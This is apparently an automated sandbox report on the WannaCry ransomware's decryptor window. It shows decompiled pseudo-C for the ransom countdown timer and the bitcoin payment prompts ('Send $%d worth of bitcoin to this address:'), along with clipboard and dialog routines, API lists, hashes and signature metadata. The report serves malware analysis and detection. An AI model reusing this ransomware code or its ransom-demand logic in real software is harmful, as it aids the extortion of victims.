										 *(_t130 + 0x2fc) = 0xffffffff;
										L00412CC2();
										_t78 = _t78 + 1;
										_t55 = SendMessageA( *( *((intOrPtr*)(_t130 + 0x18)) + 0x80), 0x1004, 0, 0);
										if(_t78 >= _t55) {
											break;
										}
										_t110 =  *((intOrPtr*)(_t130 + 0x18));
									}
									_t122 =  *(_t130 + 0x14);
								}
								 *((short*)( *(_t130 + 0x10) + _t128)) = 0;
								GlobalUnlock(_t122);
								EmptyClipboard();
								SetClipboardData(0xd, _t122);
							} else {
								GlobalFree(_t122);
							}
						}
						_t51 = CloseClipboard();
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t130 + 0x2f4));
				return _t51;
			}






















                                  0x004035a0
                                  0x004035a2
                                  0x004035ad
                                  0x004035ae
                                  0x004035b5
                                  0x004035c5
                                  0x004035d7
                                  0x004035db
                                  0x004035df
                                  0x004035e9
                                  0x004035f1
                                  0x004035fd
                                  0x00403607
                                  0x0040360d
                                  0x0040360f
                                  0x0040360f
                                  0x00403611
                                  0x00403615
                                  0x00403616
                                  0x0040361a
                                  0x0040361f
                                  0x00403628
                                  0x00403629
                                  0x0040362a
                                  0x00403635
                                  0x0040363e
                                  0x00403646
                                  0x00403653
                                  0x00403661
                                  0x00403665
                                  0x0040367a
                                  0x0040367d
                                  0x0040360f
                                  0x0040368d
                                  0x00403691
                                  0x00403695
                                  0x0040369c
                                  0x004036a4
                                  0x004036a8
                                  0x004036bc
                                  0x004036c6
                                  0x004036c8
                                  0x004036d0
                                  0x004036dc
                                  0x004036dc
                                  0x004036e2
                                  0x004036e3
                                  0x004036e7
                                  0x004036ec
                                  0x004036f1
                                  0x004036f6
                                  0x00403701
                                  0x00403702
                                  0x0040370b
                                  0x00403713
                                  0x00403718
                                  0x00403721
                                  0x00403733
                                  0x00403733
                                  0x00403735
                                  0x00403748
                                  0x00403753
                                  0x00403763
                                  0x0040376a
                                  0x00403774
                                  0x00403774
                                  0x0040377b
                                  0x00403781
                                  0x00403788
                                  0x0040378c
                                  0x00403797
                                  0x004037af
                                  0x004037b1
                                  0x004037b9
                                  0x00000000
                                  0x00000000
                                  0x004036d8
                                  0x004036d8
                                  0x004037bf
                                  0x004037bf
                                  0x004037c8
                                  0x004037ce
                                  0x004037d4
                                  0x004037dd
                                  0x004036aa
                                  0x004036ab
                                  0x004036ab
                                  0x004036a8
                                  0x004037e3
                                  0x004037e3
                                  0x004035f1
                                  0x004037f4
                                  0x00403801

                                  APIs
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004035DB
                                  • OpenClipboard.USER32(?), ref: 004035E9
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00403609
                                  • #3301.MFC42(?,00000000,00000000), ref: 0040361A
                                  • #924.MFC42 ref: 00403635
                                  • #800.MFC42 ref: 00403646
                                  • #800.MFC42 ref: 00403665
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040367B
                                  • GlobalAlloc.KERNEL32(00000002,-00000002), ref: 00403687
                                  • GlobalLock.KERNEL32(00000000), ref: 0040369C
                                  • GlobalFree.KERNEL32(00000000), ref: 004036AB
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004036C8
                                  • #3301.MFC42(?,00000000,00000000), ref: 004036E7
                                  • #924.MFC42(00000000), ref: 00403702
                                  • #800.MFC42(00000000), ref: 00403713
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000167,00000000), ref: 00403748
                                  • wcslen.MSVCRT ref: 00403753
                                  • wcslen.MSVCRT ref: 0040377B
                                  • #800.MFC42 ref: 00403797
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004037B1
                                  • GlobalUnlock.KERNEL32(00000000), ref: 004037CE
                                  • EmptyClipboard.USER32 ref: 004037D4
                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004037DD
                                  • CloseClipboard.USER32 ref: 004037E3
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#800ClipboardGlobal$#3301#924wcslen$AllocByteCharCloseDataEmptyFreeLockMultiOpenUnlockWide
                                  • String ID:
                                  • API String ID: 3405503685-0
                                  • Opcode ID: 8830a6fbde82a0506a617069f42227a829ac694ec6c697a23238cf2d660267b9
                                  • Instruction ID: c86228cefcec1f34603e32cf9825c4429cf2ad1f23db843e272d7cdac5f24a66
                                  • Opcode Fuzzy Hash: 8830a6fbde82a0506a617069f42227a829ac694ec6c697a23238cf2d660267b9
                                  • Instruction Fuzzy Hash: 0151E571204706ABD320DF64DC45FEBB7A8FB88754F10462DF249A72D0DB749909CBAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004076A0 Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 239windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 63%
                                  			E004076A0(void* __ecx) {
				intOrPtr _t89;
				char _t90;
				intOrPtr _t91;
				signed int _t94;
				intOrPtr _t98;
				signed int _t99;
				intOrPtr _t125;
				signed int _t133;
				void* _t136;
				intOrPtr _t139;
				signed int _t143;
				signed int _t147;
				void* _t148;
				intOrPtr _t161;
				signed int _t192;
				intOrPtr _t193;
				signed int _t196;
				signed int _t197;
				signed int _t198;
				intOrPtr _t200;
				intOrPtr _t202;
				void* _t204;
				intOrPtr _t206;
				void* _t207;
				void* _t208;
				void* _t209;
				void* _t210;
				void* _t211;
				void* _t213;
				long long _t225;

				_push(0xffffffff);
				_push(E00413EBB);
				_t89 =  *[fs:0x0];
				_push(_t89);
				 *[fs:0x0] = _t206;
				_t207 = _t206 - 0x8c;
				_t196 = 0;
				_t136 = __ecx;
				 *((intOrPtr*)(_t207 + 0x14)) = 0;
				 *((intOrPtr*)(_t207 + 0x18)) = 0;
				 *(_t207 + 0x1c) = 0;
				 *(_t207 + 0x20) = 0;
				_t204 = 0;
				L2:
				__imp__time(_t196);
				_t139 = M00421120; // 0x30303b30
				_t161 = _t89;
				_t90 = "00;00;00;00"; // 0x303b3030
				 *((intOrPtr*)(_t207 + 0x40)) = _t139;
				 *(_t207 + 0x3c) = _t90;
				_t91 =  *0x421124; // 0x30303b
				 *((intOrPtr*)(_t207 + 0x44)) = _t91;
				_t208 = _t207 + 4;
				 *(_t208 + 0x24) = _t196;
				memset(_t208 + 0x44, 0, 0x16 << 2);
				_t209 = _t208 + 0xc;
				if(_t204 != 0) {
					_t94 =  *(_t136 + 0x580);
				} else {
					_t94 =  *(_t136 + 0x57c);
				}
				_t98 =  *((intOrPtr*)(_t136 + 0x578));
				_t143 = _t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4) * 4) * 8 << 7;
				if(_t161 <= _t98) {
					_t99 =  *(_t209 + 0x24);
				} else {
					_t133 = _t98 - _t161 + _t143;
					_t196 = _t133;
					if(_t196 <= 0) {
						_t99 =  *(_t209 + 0x24);
					} else {
						asm("cdq");
						_t99 = _t133 * 0x64 / _t143;
					}
					if(_t196 < 0) {
						_t196 = 0;
					}
				}
				if(_t204 != 0) {
					 *(_t209 + 0x20) = _t99;
				} else {
					 *(_t209 + 0x14) = _t196;
					 *(_t209 + 0x1c) = _t99;
				}
				 *(_t209 + 0x2e) = ((0xc22e4507 * _t196 >> 0x20) + _t196 >> 0x10) + ((0xc22e4507 * _t196 >> 0x20) + _t196 >> 0x10 >> 0x1f);
				_t147 =  *(_t209 + 0x2e) & 0x0000ffff;
				_t197 = _t196 + ( ~((_t147 << 4) - _t147) +  ~((_t147 << 4) - _t147) * 4 + ( ~((_t147 << 4) - _t147) +  ~((_t147 << 4) - _t147) * 4) * 8 << 7);
				 *(_t209 + 0x30) = ((0x91a2b3c5 * _t197 >> 0x20) + _t197 >> 0xb) + ((0x91a2b3c5 * _t197 >> 0x20) + _t197 >> 0xb >> 0x1f);
				_t192 =  *(_t209 + 0x30) & 0x0000ffff;
				_t198 = _t197 + _t192 * 0xfffff1f0;
				 *(_t209 + 0x32) = ((0x88888889 * _t198 >> 0x20) + _t198 >> 5) + ((0x88888889 * _t198 >> 0x20) + _t198 >> 5 >> 0x1f);
				sprintf(_t209 + 0x48, "%02d;%02d;%02d;%02d", _t147, _t192,  *(_t209 + 0x32) & 0x0000ffff, _t198 +  ~((( *(_t209 + 0x32) & 0x0000ffff) << 4) - ( *(_t209 + 0x32) & 0x0000ffff)) * 4);
				_t207 = _t209 + 0x18;
				if(_t204 != 0) {
					_t148 = _t136 + 0x444;
					_push(_t207 + 0x38);
				} else {
					_push(_t207 + 0x38);
					_t148 = _t136 + 0x3c8;
				}
				_t89 = E00405180(_t148);
				_t204 = _t204 + 1;
				if(_t204 < 2) {
					_t196 = 0;
					goto L2;
				}
				SendMessageA( *(_t136 + 0x140), 0x402,  *(_t207 + 0x1c), 0);
				SendMessageA( *(_t136 + 0x1c4), 0x402,  *(_t207 + 0x20), 0);
				L00412DA6();
				 *(_t207 + 0xa4) = 0;
				_t225 =  *((intOrPtr*)(_t136 + 0x584));
				if( *((intOrPtr*)(_t207 + 0x14)) <= 0) {
					_t225 = _t225 + st0;
					 *(_t136 + 0x818) = 1;
				}
				_t124 =  *((intOrPtr*)(_t136 + 0x588));
				if(_t124 != 0) {
					 *((long long*)(_t207 + 0x14)) = _t225;
					_t200 =  *((intOrPtr*)(_t207 + 0x18));
					_t193 =  *((intOrPtr*)(_t207 + 0x14));
					_push(_t200);
					_push(_t193);
					_t124 = _t136 + 0x81c;
					_push("%.1f BTC");
					_push(_t136 + 0x81c);
					L00412E00();
					_t210 = _t207 + 0x10;
					_push(_t200);
					_push(_t193);
					_push("Send %.1f BTC to this address:");
					_push(_t210 + 0x10);
					L00412E00();
					_t211 = _t210 + 0x10;
				} else {
					L0041304A();
					_t202 = _t124;
					_push(_t202);
					_push("$%d");
					_push(_t136 + 0x81c);
					L00412E00();
					_t213 = _t207 + 0xc;
					_push(_t202);
					_push("Send $%d worth of bitcoin to this address:");
					_push(_t213 + 0x10);
					L00412E00();
					_t211 = _t213 + 0xc;
				}
				_push( *((intOrPtr*)(_t211 + 0x10)));
				_push(0x402);
				L00412CE6();
				L00412CE0();
				_t125 =  *((intOrPtr*)(_t136 + 0x824));
				 *((intOrPtr*)(_t136 + 0x824)) = 0x121284;
				if(_t125 != 0x121284) {
					E004079C0(_t136);
					_t125 =  *((intOrPtr*)(_t211 + 0xac));
					if(_t125 != 0) {
						InvalidateRect( *(_t136 + 0x20), 0, 1);
						_push( *((intOrPtr*)(_t136 + 0x824)));
						E00405920(_t136 + 0x3c8,  *((intOrPtr*)(_t136 + 0x824)), 0xffffff);
						_push( *((intOrPtr*)(_t136 + 0x824)));
						_t125 = E00405920(_t136 + 0x444,  *((intOrPtr*)(_t136 + 0x824)), 0xffffff);
					}
				}
				 *((intOrPtr*)(_t211 + 0xa4)) = 0xffffffff;
				L00412CC2();
				 *[fs:0x0] =  *((intOrPtr*)(_t211 + 0x9c));
				return _t125;
			}

































                                  0x004076a0
                                  0x004076a2
                                  0x004076a7
                                  0x004076ad
                                  0x004076ae
                                  0x004076b5
                                  0x004076be
                                  0x004076c1
                                  0x004076c3
                                  0x004076c7
                                  0x004076cb
                                  0x004076cf
                                  0x004076d3
                                  0x004076d9
                                  0x004076da
                                  0x004076e0
                                  0x004076e6
                                  0x004076e8
                                  0x004076ed
                                  0x004076f1
                                  0x004076f5
                                  0x004076fa
                                  0x004076fe
                                  0x0040770c
                                  0x00407712
                                  0x00407712
                                  0x00407714
                                  0x0040771e
                                  0x00407716
                                  0x00407716
                                  0x00407716
                                  0x00407730
                                  0x00407736
                                  0x0040773b
                                  0x0040775b
                                  0x0040773d
                                  0x0040773f
                                  0x00407741
                                  0x00407745
                                  0x0040774f
                                  0x00407747
                                  0x0040774a
                                  0x0040774b
                                  0x0040774b
                                  0x00407755
                                  0x00407757
                                  0x00407757
                                  0x00407755
                                  0x00407761
                                  0x0040776d
                                  0x00407763
                                  0x00407763
                                  0x00407767
                                  0x00407767
                                  0x00407784
                                  0x0040778d
                                  0x004077aa
                                  0x004077bf
                                  0x004077c8
                                  0x004077d6
                                  0x004077e6
                                  0x0040780e
                                  0x00407814
                                  0x00407819
                                  0x0040782c
                                  0x00407832
                                  0x0040781b
                                  0x0040781f
                                  0x00407820
                                  0x00407820
                                  0x00407833
                                  0x00407838
                                  0x0040783c
                                  0x004076d7
                                  0x00000000
                                  0x004076d7
                                  0x0040785b
                                  0x00407870
                                  0x00407876
                                  0x0040787f
                                  0x0040788a
                                  0x00407892
                                  0x00407894
                                  0x00407896
                                  0x00407896
                                  0x004078a0
                                  0x004078a8
                                  0x004078db
                                  0x004078df
                                  0x004078e3
                                  0x004078e7
                                  0x004078e8
                                  0x004078e9
                                  0x004078ef
                                  0x004078f4
                                  0x004078f5
                                  0x004078fa
                                  0x00407901
                                  0x00407902
                                  0x00407903
                                  0x00407908
                                  0x00407909
                                  0x0040790e
                                  0x004078aa
                                  0x004078aa
                                  0x004078af
                                  0x004078b7
                                  0x004078b8
                                  0x004078bd
                                  0x004078be
                                  0x004078c3
                                  0x004078ca
                                  0x004078cb
                                  0x004078d0
                                  0x004078d1
                                  0x004078d6
                                  0x004078d6
                                  0x00407917
                                  0x00407918
                                  0x0040791d
                                  0x00407924
                                  0x00407929
                                  0x0040792f
                                  0x0040793e
                                  0x00407942
                                  0x00407947
                                  0x00407950
                                  0x0040795a
                                  0x0040796c
                                  0x00407973
                                  0x00407984
                                  0x0040798b
                                  0x0040798b
                                  0x00407950
                                  0x00407994
                                  0x0040799f
                                  0x004079af
                                  0x004079bc

                                  APIs
                                  • time.MSVCRT ref: 004076DA
                                  • sprintf.MSVCRT ref: 0040780E
                                  • SendMessageA.USER32(?,00000402,?,00000000), ref: 0040785B
                                  • SendMessageA.USER32(?,00000402,?,00000000), ref: 00407870
                                  • #540.MFC42 ref: 00407876
                                  • _ftol.MSVCRT ref: 004078AA
                                  • #2818.MFC42(?,$%d,00000000), ref: 004078BE
                                  • #2818.MFC42(?,Send $%d worth of bitcoin to this address:,00000000), ref: 004078D1
                                  • #2818.MFC42(?,%.1f BTC,?,?), ref: 004078F5
                                  • #2818.MFC42(?,Send %.1f BTC to this address:,?,?), ref: 00407909
                                  • #3092.MFC42(00000402,?), ref: 0040791D
                                  • #6199.MFC42(00000402,?), ref: 00407924
                                  • InvalidateRect.USER32(?,00000000,00000001,00000402,?), ref: 0040795A
                                  • #800.MFC42 ref: 0040799F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2818$MessageSend$#3092#540#6199#800InvalidateRect_ftolsprintftime
                                  • String ID: $%d$%.1f BTC$%02d;%02d;%02d;%02d$00;00;00;00$Send $%d worth of bitcoin to this address:$Send %.1f BTC to this address:
                                  • API String ID: 993288296-3256873439
                                  • Opcode ID: 4d580652efe8d7a149869b3900c519b1c6978745f6efd4f0e097fd633cdec313
                                  • Instruction ID: 9b53b323f570066dafa0cf34324f53a17123da88a1e7ff32529d6bfb7c89d06c
                                  • Opcode Fuzzy Hash: 4d580652efe8d7a149869b3900c519b1c6978745f6efd4f0e097fd633cdec313
                                  • Instruction Fuzzy Hash: 3281D4B1A043019BD720DF18C981FAB77E9EF88700F04893EF949DB395DA74A9058B96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405E10 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 144COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 96%
                                  			E00405E10(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				void* _t86;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t123;
				intOrPtr* _t124;
				intOrPtr* _t125;
				intOrPtr* _t126;
				intOrPtr* _t127;
				intOrPtr _t132;

				_push(0xffffffff);
				_push(E00413C65);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t132;
				_v20 = __ecx;
				_v4 = 0;
				_t121 = __ecx + 0x890;
				_v16 = _t121;
				 *_t121 = 0x415c00;
				_v4 = 0x1d;
				L00412D52();
				 *_t121 = 0x415bec;
				_t122 = __ecx + 0x888;
				_v16 = _t122;
				 *_t122 = 0x415c00;
				_v4 = 0x1e;
				L00412D52();
				 *_t122 = 0x415bec;
				_t123 = __ecx + 0x880;
				_v16 = _t123;
				 *_t123 = 0x415c00;
				_v4 = 0x1f;
				L00412D52();
				 *_t123 = 0x415bec;
				_t124 = __ecx + 0x878;
				_v16 = _t124;
				 *_t124 = 0x415c00;
				_v4 = 0x20;
				L00412D52();
				 *_t124 = 0x415bec;
				_v4 = 0x18;
				 *((intOrPtr*)(__ecx + 0x870)) = 0x415a44;
				E00403F20(__ecx + 0x870);
				_v4 = 0x17;
				 *((intOrPtr*)(__ecx + 0x868)) = 0x415a44;
				E00403F20(__ecx + 0x868);
				_v4 = 0x16;
				 *((intOrPtr*)(__ecx + 0x860)) = 0x415a44;
				E00403F20(__ecx + 0x860);
				_v4 = 0x15;
				 *((intOrPtr*)(__ecx + 0x858)) = 0x415a44;
				E00403F20(__ecx + 0x858);
				_t125 = __ecx + 0x850;
				_v16 = _t125;
				 *_t125 = 0x415c00;
				_v4 = 0x21;
				L00412D52();
				 *_t125 = 0x415bec;
				_v4 = 0x13;
				 *((intOrPtr*)(__ecx + 0x848)) = 0x415a44;
				E00403F20(__ecx + 0x848);
				_v4 = 0x12;
				 *((intOrPtr*)(__ecx + 0x840)) = 0x415a44;
				E00403F20(__ecx + 0x840);
				_v4 = 0x11;
				 *((intOrPtr*)(__ecx + 0x838)) = 0x415a44;
				E00403F20(__ecx + 0x838);
				_t126 = __ecx + 0x830;
				_v16 = _t126;
				 *_t126 = 0x415c00;
				_v4 = 0x22;
				L00412D52();
				 *_t126 = 0x415bec;
				_v4 = 0xf;
				L00412CC2();
				_v4 = 0xe;
				L00412CC2();
				_v4 = 0xd;
				L00412CC2();
				_v4 = 0xc;
				L00412CC2();
				_v4 = 0xb;
				L00412EF6();
				_v4 = 0xa;
				E004050A0(__ecx + 0x444);
				_v4 = 9;
				E004050A0(__ecx + 0x3c8);
				_v4 = 8;
				E00404170(__ecx + 0x360);
				_v4 = 7;
				E00404170(__ecx + 0x2f8);
				_v4 = 6;
				E00404170(__ecx + 0x290);
				_v4 = 5;
				E00404170(__ecx + 0x228);
				_t127 = __ecx + 0x1a4;
				_v16 = _t127;
				 *_t127 = 0x4161a4;
				_v4 = 0x23;
				L00412F0E();
				_v4 = 4;
				L00412C9E();
				_v4 = 3;
				_t86 = E00405D90(__ecx + 0x120);
				_v4 = 2;
				L00412EF0();
				_v4 = 1;
				L00412EF0();
				_v4 = 0;
				L00412D4C();
				_v4 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v12;
				return _t86;
			}
















                                  0x00405e10
                                  0x00405e12
                                  0x00405e1d
                                  0x00405e1e
                                  0x00405e2c
                                  0x00405e30
                                  0x00405e38
                                  0x00405e3e
                                  0x00405e42
                                  0x00405e4a
                                  0x00405e4f
                                  0x00405e54
                                  0x00405e5a
                                  0x00405e60
                                  0x00405e64
                                  0x00405e6c
                                  0x00405e71
                                  0x00405e76
                                  0x00405e7c
                                  0x00405e82
                                  0x00405e86
                                  0x00405e8e
                                  0x00405e93
                                  0x00405e98
                                  0x00405e9e
                                  0x00405ea4
                                  0x00405ea8
                                  0x00405eb0
                                  0x00405eb5
                                  0x00405ec0
                                  0x00405ec6
                                  0x00405ecb
                                  0x00405ed1
                                  0x00405edc
                                  0x00405ee1
                                  0x00405ee7
                                  0x00405ef2
                                  0x00405ef7
                                  0x00405efd
                                  0x00405f08
                                  0x00405f0d
                                  0x00405f13
                                  0x00405f18
                                  0x00405f1e
                                  0x00405f22
                                  0x00405f2a
                                  0x00405f2f
                                  0x00405f3a
                                  0x00405f40
                                  0x00405f45
                                  0x00405f4b
                                  0x00405f56
                                  0x00405f5b
                                  0x00405f61
                                  0x00405f6c
                                  0x00405f71
                                  0x00405f77
                                  0x00405f7c
                                  0x00405f82
                                  0x00405f86
                                  0x00405f8e
                                  0x00405f93
                                  0x00405f9e
                                  0x00405fa4
                                  0x00405fa9
                                  0x00405fb4
                                  0x00405fb9
                                  0x00405fc4
                                  0x00405fc9
                                  0x00405fd4
                                  0x00405fd9
                                  0x00405fe4
                                  0x00405fe9
                                  0x00405ff4
                                  0x00405ff9
                                  0x00406004
                                  0x00406009
                                  0x00406014
                                  0x00406019
                                  0x00406024
                                  0x00406029
                                  0x00406034
                                  0x00406039
                                  0x00406044
                                  0x00406049
                                  0x0040604e
                                  0x00406054
                                  0x00406058
                                  0x00406061
                                  0x00406066
                                  0x0040606d
                                  0x00406072
                                  0x0040607d
                                  0x00406082
                                  0x0040608d
                                  0x00406092
                                  0x0040609d
                                  0x004060a2
                                  0x004060aa
                                  0x004060af
                                  0x004060b6
                                  0x004060be
                                  0x004060c9
                                  0x004060d3

                                  APIs
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E4F
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E71
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E93
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405EB5
                                    • Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F2F
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F93
                                  • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FA9
                                  • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FB9
                                  • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FC9
                                  • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FD9
                                  • #781.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FE9
                                    • Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
                                    • Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD
                                    • Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                    • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                    • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                    • Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                  • #654.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406066
                                  • #765.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406072
                                    • Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
                                    • Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD
                                  • #609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406092
                                  • #609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060A2
                                  • #616.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060AF
                                  • #641.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060BE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414$#800$#609#654#765#795$#616#641#781
                                  • String ID: #
                                  • API String ID: 2377847243-1885708031
                                  • Opcode ID: 0807114d2ea519295407346a987a160cd163468119fa121364e43a1f09c9544f
                                  • Instruction ID: 200a364df958368678b01019567048f7f095356612ddb79f46c50176d87071e4
                                  • Opcode Fuzzy Hash: 0807114d2ea519295407346a987a160cd163468119fa121364e43a1f09c9544f
                                  • Instruction Fuzzy Hash: C4710A74008782CED305EF65C0453DAFFE4AFA5348F54484EE0DA57292DBB86299CBE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004032C0 Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 114windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 69%
                                  			E004032C0(intOrPtr __ecx) {
				intOrPtr _t16;
				long _t17;
				struct HFONT__* _t19;
				long _t20;
				long _t21;
				long _t23;
				int _t35;
				int _t38;
				int _t40;
				int _t47;
				intOrPtr _t48;

				_t48 = __ecx;
				L00412CB0();
				_t16 =  *0x42189c; // 0x0
				_t17 =  *(_t16 + 0x824);
				 *(__ecx + 0xe8) = _t17;
				_push(CreateSolidBrush(_t17));
				L00412D5E();
				_t47 = __ecx + 0xec;
				_t19 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
				_push(_t19);
				L00412D5E();
				_push(0x408);
				L00412CE6();
				if(_t47 != 0) {
					_t35 =  *(_t47 + 4);
				} else {
					_t35 = 0;
				}
				_t20 = SendMessageA( *(_t19 + 0x20), 0x30, _t35, 1);
				_push(0x409);
				L00412CE6();
				if(_t47 != 0) {
					_t38 =  *(_t47 + 4);
				} else {
					_t38 = 0;
				}
				_t21 = SendMessageA( *(_t20 + 0x20), 0x30, _t38, 1);
				_push(2);
				L00412CE6();
				if(_t47 != 0) {
					_t40 =  *(_t47 + 4);
				} else {
					_t40 = 0;
				}
				_t23 = SendMessageA( *(_t21 + 0x20), 0x30, _t40, 1);
				_push(0x40e);
				L00412CE6();
				if(_t47 != 0) {
					_t47 =  *(_t47 + 4);
				}
				SendMessageA( *(_t23 + 0x20), 0x30, _t47, 1);
				E00403CB0(_t48);
				SendMessageA( *(_t48 + 0xc0), 0x14e, 0, 0);
				_push(0xffffffff);
				_push(0xffffffff);
				_push(0);
				_push("Path");
				_push(0);
				L00412D58();
				SendMessageA( *(_t48 + 0x80), 0x101e, 0, 0x1f4);
				 *0x4217bc = _t48;
				return 1;
			}














                                  0x004032c3
                                  0x004032c5
                                  0x004032ca
                                  0x004032cf
                                  0x004032d6
                                  0x004032e2
                                  0x004032e9
                                  0x00403310
                                  0x00403316
                                  0x0040331c
                                  0x0040331f
                                  0x00403324
                                  0x0040332b
                                  0x00403332
                                  0x00403338
                                  0x00403334
                                  0x00403334
                                  0x00403334
                                  0x0040334a
                                  0x0040334c
                                  0x00403353
                                  0x0040335a
                                  0x00403360
                                  0x0040335c
                                  0x0040335c
                                  0x0040335c
                                  0x0040336c
                                  0x0040336e
                                  0x00403372
                                  0x00403379
                                  0x0040337f
                                  0x0040337b
                                  0x0040337b
                                  0x0040337b
                                  0x0040338b
                                  0x0040338d
                                  0x00403394
                                  0x0040339b
                                  0x0040339d
                                  0x0040339d
                                  0x004033a9
                                  0x004033ad
                                  0x004033c2
                                  0x004033c4
                                  0x004033c6
                                  0x004033c8
                                  0x004033ca
                                  0x004033cf
                                  0x004033d4
                                  0x004033ec
                                  0x004033ee
                                  0x004033fc

                                  APIs
                                  • #4710.MFC42 ref: 004032C5
                                  • CreateSolidBrush.GDI32(?), ref: 004032DC
                                  • #1641.MFC42(00000000), ref: 004032E9
